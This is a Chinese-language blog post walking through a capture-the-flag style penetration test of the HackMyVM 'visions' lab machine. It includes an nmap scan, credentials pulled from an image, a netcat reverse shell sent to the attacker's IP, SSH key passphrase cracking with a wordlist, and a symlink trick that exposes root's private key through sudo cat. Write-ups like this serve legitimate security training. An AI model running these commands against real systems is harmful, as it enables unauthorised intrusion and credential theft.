freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次hackmyvm综合靶场的渗透测试-visions
2022-04-27 09:34:55
所属地 黑龙江省

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

信息收集阶段

KALI攻击机:192.168.1.128

靶机:192.168.1.119

目标:root.txt和user.txt

nmap -A -p1-65535 192.168.1.119

1651022993_62689c91ec72075827cd6.png!small?1651022994657

开启了22端口和80端口:

http://192.168.1.119/

直接访问:白屏!

查看源代码!

1651023000_62689c984c45f9c340c60.png!small?1651023000699

看来白屏没啥问题!因为white.png!

看下上面的提示信息:

Only those that can see the invisible can do the imposible.

You have to be able to see what doesnt exist.

Only those that can see the invisible being able to see whats not there.

-alicia

直接翻译:

只有那些看得见看不见的人才能做不可能的事。

你必须能够看到不存在的东西。

只有那些能看到无形的人才能看到不存在的东西。

然后还有一个用户alicia!!

我猜测是否有信息隐藏在这张white.png的图片中,这也对应了上面说的话!

exiftool white.png

1651023016_62689ca80b856c7794550.png!small?1651023016489

这下用户名和密码就都有了!

用户名:alicia

密码:ihaveadream


漏洞利用阶段

ssh连接下,但是我感觉没这么简单!

1651023045_62689cc5a82476379cbb7.png!small?1651023046130

用户还挺多!

sudo -l走起!

1651023051_62689ccb53b53e60a8d6b.png!small?1651023051724

这题有点简单啊!把bash送出去!

sudo -u emma /usr/bin/nc 192.168.1.128 4444 -e /bin/bash

1651023056_62689cd07bc879c85aafe.png!small?1651023057171

修改为交互式的shell!

python3 -c 'import pty; pty.spawn("/bin/bash")'

1651023061_62689cd53ee0a46c68b5b.png!small?1651023061711

我无法帮助我自己?!啥意思!我错了,应该不是很简单,感觉自己掉坑里了!

查一下!需要的flag在这!

1651023067_62689cdb2956717eb1236.png!small

看了大佬的wp,我完全时掉沟里了!这里需要用到一个gimp工具,其实和ps一样!然后gimp white.png,调节colors-curves曲线!

1651023079_62689ce7e3478c8548e5f.png!small?1651023080315

sophia的密码就出来了!哈哈哈哈哈哈!用PS也可以达到这个效果!

sophia/seemstobeimpossible,登录下看看!

1651023092_62689cf4c6658519b8c92.png!small?1651023093421

第一个flag:

cat user.txt

hmvi***ver

权限提升阶段

接着就是提权root了!

1651023121_62689d112a6044cd9aa11.png!small?1651023121575

我想偷个鸡!失败了!

1651023125_62689d157d95ae253bee2.png!small?1651023125915

还是常规套路吧,查看下这个文件!

sudo cat /home/isabella/.invisible

1651023129_62689d199924c3007cf59.png!small?1651023130687

isabella账户的密钥!采用这个密钥连接isabella账户,不出所料,又有密码!

1651023135_62689d1f752aebc112c7b.png!small?1651023135883

爆破下:./RSAcrack.sh -w rockyou.txt -k isabella_rsa

1651023140_62689d242dc06cdb6841d.png!small?1651023140721

密码是:invisible

登陆下:

1651023145_62689d29bbca93922e331.png!small?1651023146248

如果不是前面就掉坑了,这里肯定又上当了!

但思路并不是这样:

sophia的sudo权限包括cat和读取isabella的.invisible文件。所以,当我们以isabella账户登录时,我们创建一个.invisible文件与root的密钥文件的软链接,然后通过sophia账户来读取root的密钥。

rm .invisible

ln -s /root/.ssh/id_rsa .invisible

ls -al

1651023152_62689d30a0ab0a6e4d531.png!small?1651023153154

sudo cat /home/isabella/.invisible 这次就是root的id_rsa了!

1651023158_62689d361c0f9f3485832.png!small?1651023158710

ssh -i rootidrsa root@192.168.1.119

1651023163_62689d3bcb588e4026be6.png!small?1651023164301

最后的flag:

cat root.txt

hm**********ble


# 渗透测试 # web安全 # 网络安全技术 # 靶场平台 # 靶场实战
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录